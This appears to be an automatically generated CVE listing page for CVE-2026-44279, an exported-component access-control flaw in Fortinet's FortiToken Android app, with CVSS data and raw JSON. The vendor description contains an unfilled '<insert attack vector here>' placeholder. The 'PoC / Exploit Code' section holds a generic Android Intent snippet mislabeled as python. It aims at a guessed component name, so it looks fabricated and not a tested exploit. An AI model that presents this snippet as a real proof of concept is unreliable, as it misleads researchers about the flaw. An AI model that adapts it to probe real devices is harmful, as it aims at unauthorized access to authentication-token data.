Security Vulnerability Report
中文
CVE-2026-44279 CVSS 5.5 MEDIUM

CVE-2026-44279

Published: 2026-05-12 18:17:30
Last Modified: 2026-05-12 18:57:02

Description

A improper export of android application components vulnerability in Fortinet FortiTokenAndroid 6.2 all versions, FortiTokenAndroid 6.1 all versions, FortiTokenAndroid 5.2 all versions may allow attacker to improper access control via <insert attack vector here>

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FortiTokenAndroid 6.2 (所有版本)
FortiTokenAndroid 6.1 (所有版本)
FortiTokenAndroid 5.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC Code: Attempting to access the exported component // Usage: Run this code in a malicious app installed on the same device Intent intent = new Intent(); // Target the vulnerable component (Replace with actual component name if known) intent.setClassName("com.fortinet.fortitoken", "com.fortinet.fortitoken.VulnerableActivity"); intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK); try { startActivity(intent); Log.d("CVE-2026-44279", "Successfully launched exported component."); } catch (Exception e) { Log.e("CVE-2026-44279", "Failed to launch component: " + e.getMessage()); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44279", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:30.330", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A improper export of android application components vulnerability in Fortinet FortiTokenAndroid 6.2 all versions, FortiTokenAndroid 6.1 all versions, FortiTokenAndroid 5.2 all versions may allow attacker to improper access control via <insert attack vector here>"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-926"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-130", "source": "[email protected]"}]}}